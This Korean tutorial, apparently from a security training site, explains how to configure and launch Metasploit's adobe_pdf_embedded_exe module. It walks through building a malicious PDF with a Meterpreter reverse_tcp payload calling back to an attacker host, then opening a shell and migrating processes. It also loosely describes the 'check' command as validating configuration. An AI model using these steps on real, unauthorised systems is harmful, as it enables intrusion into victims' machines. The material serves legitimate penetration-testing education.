Metasploit 에서 adobe_pdf_embedded_exe 익스플로잇 모듈 옵션 구성 방법

HydraBeginner
지금 연습하기

소개

이 튜토리얼에서는 사이버 보안 도구 Metasploit 에서 adobe_pdf_embedded_exe 익스플로잇 모듈을 구성하는 방법을 안내합니다. 이 튜토리얼을 마치면 이 익스플로잇을 활용하여 접근 권한을 얻고 사이버 보안 기술을 향상시키는 방법에 대한 이해도가 높아질 것입니다.

Metasploit 개요

Metasploit 은 원격 대상 시스템에 대한 익스플로잇 코드를 개발, 테스트 및 실행하기 위한 강력한 오픈소스 프레임워크입니다. 취약한 시스템을 식별, 탐색 및 접근하는 데 사용할 수 있는 포괄적인 도구 및 모듈 세트를 제공합니다.

Metasploit 프레임워크는 침투 테스트, 취약성 평가 및 사고 대응을 포함한 다양한 목적으로 사이버 보안 커뮤니티에서 널리 사용됩니다. Linux, Windows 및 macOS 를 포함한 여러 운영 체제에서 사용할 수 있으며, 명령줄 인터페이스 (CLI) 또는 Metasploit Pro 라는 그래픽 사용자 인터페이스 (GUI) 를 통해 접근할 수 있습니다.

Metasploit 의 주요 기능 중 하나는 다양한 소프트웨어 취약점을 대상으로 할 수 있는 광범위한 사전 구축된 익스플로잇 라이브러리입니다. 이러한 익스플로잇은 원격 코드 실행, 권한 상승 및 서비스 거부와 같은 여러 범주로 분류되며, Metasploit 콘솔을 사용하여 쉽게 구성 및 실행할 수 있습니다.

Metasploit 을 사용하려면 일반적으로 시스템에 Metasploit 환경을 설정합니다. 이는 공식 Metasploit 웹사이트에서 다운로드할 수 있는 Metasploit 프레임워크를 설치하여 수행할 수 있습니다. 설치 후 Metasploit 콘솔에 접근하여 사용 가능한 다양한 모듈 및 도구를 탐색할 수 있습니다.

Metasploit 콘솔은 프레임워크와 상호 작용하기 위한 강력한 명령줄 인터페이스를 제공합니다. 사용자는 콘솔을 사용하여 익스플로잇을 검색하고 선택하고, 페이로드 및 옵션을 구성하고, 대상 시스템에 대한 익스플로잇을 실행할 수 있습니다. 콘솔은 세션 관리, 대상 시스템 정보 수집 및 침해 후 활동 수행과 같은 다양한 기능도 제공합니다.

전반적으로 Metasploit 은 취약한 시스템을 식별, 탐색 및 접근하는 포괄적이고 유연한 플랫폼을 제공하기 때문에 사이버 보안 분야에서 일하는 모든 사람에게 중요한 도구입니다.

adobe_pdf_embedded_exe 익스플로잇 구성

Metasploit 의 adobe_pdf_embedded_exe 익스플로잇 모듈은 Adobe Reader 및 Acrobat 의 임의 코드 실행 취약점을 대상으로 설계되었습니다. 공격자가 대상 시스템에 접근하여 권한을 상승하거나 추가 페이로드를 실행해야 하는 시나리오에서 특히 유용할 수 있습니다.

adobe_pdf_embedded_exe 익스플로잇 모듈을 구성하려면 다음 단계를 따르세요.

익스플로잇 모듈 선택

  1. Ubuntu 22.04 터미널에서 다음 명령어를 실행하여 Metasploit 콘솔을 시작합니다.
    msfconsole
  2. Metasploit 콘솔에서 다음 명령어를 사용하여 adobe_pdf_embedded_exe 익스플로잇 모듈을 검색합니다.
    search adobe_pdf_embedded_exe
  3. use 명령어를 실행하고 모듈 이름을 입력하여 해당 모듈을 선택합니다.
    use exploit/windows/fileformat/adobe_pdf_embedded_exe

익스플로잇 옵션 구성

adobe_pdf_embedded_exe 익스플로잇 모듈을 선택한 후에는 필요에 따라 다양한 옵션을 구성할 수 있습니다. show options 명령어를 실행하여 사용 가능한 옵션을 확인할 수 있습니다.

show options

이 명령어는 필수 및 선택적 매개변수와 현재 값을 표시하는 테이블을 표시합니다. set 명령어를 사용하여 이러한 매개변수의 값을 설정할 수 있습니다. 예를 들어:

set FILENAME malicious.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444

이 예에서는 FILENAME 옵션을 malicious.pdf, PAYLOAD 옵션을 windows/meterpreter/reverse_tcp, LHOST 옵션을 192.168.1.10, LPORT 옵션을 4444로 설정합니다.

익스플로잇 옵션을 구성한 후에는 show options 명령어를 다시 실행하여 설정을 확인할 수 있습니다.

익스플로잇 구성 검증

익스플로잇을 실행하기 전에 모든 필수 옵션이 올바르게 설정되었는지 확인하기 위해 구성을 검증하는 것이 좋습니다. check 명령어를 실행하여 이 작업을 수행할 수 있습니다.

check

구성이 유효하면 check 명령어는 익스플로잇이 실행 준비가 되었음을 나타냅니다.

이제 adobe_pdf_embedded_exe 익스플로잇 모듈을 구성했으므로 익스플로잇을 실행하고 대상 시스템에 접근할 준비가 되었습니다.

익스플로잇 실행 및 접근

adobe_pdf_embedded_exe 익스플로잇 모듈을 구성한 후에는 익스플로잇을 실행하여 대상 시스템에 접근하려고 시도할 수 있습니다.

익스플로잇 실행

익스플로잇을 실행하려면 Metasploit 콘솔에서 exploit 또는 run 명령어를 실행합니다.

exploit

또는

run

이 명령어는 익스플로잇을 시작하고 지정된 페이로드를 대상 시스템에서 실행하려고 시도합니다.

접근

익스플로잇이 성공하면 Metasploit 콘솔에 세션이 설정되었음을 나타내는 출력이 표시됩니다. 이 세션은 대상 시스템과의 연결을 나타내며, 손상된 시스템과 상호 작용하는 데 사용할 수 있습니다.

설정된 세션과 상호 작용하려면 sessions 명령어를 사용하여 모든 활성 세션을 나열하고, sessions -i <session_id> 명령어를 사용하여 특정 세션으로 전환할 수 있습니다. 세션으로 전환한 후에는 Metasploit 의 다양한 침해 후 모듈 및 명령어를 사용하여 정보 수집, 권한 상승 및 대상 시스템에서 추가 작업을 수행할 수 있습니다.

예를 들어, 대상 시스템에서 명령 프롬프트를 얻으려면 shell 명령어를 사용하거나, 세션의 안정성과 지속성을 높이기 위해 페이로드를 다른 프로세스로 마이그레이션하려면 migrate 명령어를 사용할 수 있습니다.

sessions -i 1
shell
migrate 1234

adobe_pdf_embedded_exe 익스플로잇을 실행하고 대상 시스템에 접근하면 포괄적인 침투 테스트 또는 보안 평가의 일환으로 추가적인 정찰, 권한 상승 및 횡단 이동 활동을 수행할 수 있습니다.

요약

이 사이버 보안 튜토리얼에서는 Metasploit 의 adobe_pdf_embedded_exe 익스플로잇 모듈 옵션을 구성하는 방법을 배웠습니다. 익스플로잇을 실행하고 접근함으로써 사이버 보안 분야의 지식과 기술을 확장했습니다. 이 튜토리얼은 사이버 보안 환경을 탐색하고 Metasploit 을 활용하여 보안 테스트 능력을 향상시키고자 하는 사람들에게 귀중한 자료를 제공합니다.